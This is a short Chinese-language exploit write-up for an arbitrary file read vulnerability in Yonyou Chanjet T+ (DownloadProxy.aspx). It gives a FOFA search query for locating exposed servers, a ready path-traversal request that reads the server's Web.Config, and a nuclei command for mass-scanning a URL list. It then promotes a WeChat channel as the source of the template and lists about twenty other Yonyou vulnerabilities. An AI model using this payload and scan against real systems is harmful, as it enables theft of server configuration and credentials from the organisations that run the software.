用友畅捷通T+ DownloadProxy.aspx 任意文件读取漏洞

用友畅捷通T+ DownloadProxy.aspx 任意文件读取漏洞漏洞描述

用友畅捷通T+ DownloadProxy.aspx文件存在任意文件读取漏洞，攻击者通过漏洞可以获取服务器上的敏感文件

漏洞影响

用友 畅捷通T+

FOFA

app="畅捷通-TPlus"

漏洞复现

登录页面

验证POC

/tplus/SM/DTS/DownloadProxy.aspx?preload=1&Path=../../Web.Config

nuclei-pocs

nuclei -tnuclei -t yonyou_changjietong_readfile_DownloadProxy.yaml -l url.txt

nuclei-poc 关注北极星sec公众号回复0921获取

用友漏洞待更新记录

用友 U8 OA test.jsp SQL注入漏洞
用友nc v6.5 远程命令执行漏洞（CNVD-2021-30167）
用友畅捷通T+ DownloadProxy.aspx 任意文件读取漏洞

用友 U8 OA getSessionList.jsp 敏感信息泄漏漏洞
用友 NCCloud FS文件管理SQL注入
用友 NC NCFindWeb 任意文件读取漏洞
用友 NC bsh.servlet.BshServlet 远程命令执行漏洞
用友 GRP-U8 Proxy SQL注入 CNNVD-201610-923
用友 FE协作办公平台 templateOfTaohong_manager.jsp 目录遍历漏洞
用友 ERP-NC NCFindWeb 目录遍历漏洞
用友nc v6.5 反序列化漏洞补丁绕过
用友nc v6.5 反序列化漏洞
用友nc v6.5 反射型xss
用友nc v6.5 前台任意文件上传漏洞
（CNVD-2021-37786）用友nc Cloud FS 文件管理系统任意账户登录漏洞
用友 GRP-u8 前台存在任意文件上传漏洞
用友nc IUFO v5.3 反射型xss
用友nc 控制台绕过漏洞
用友nc 数据库密码解密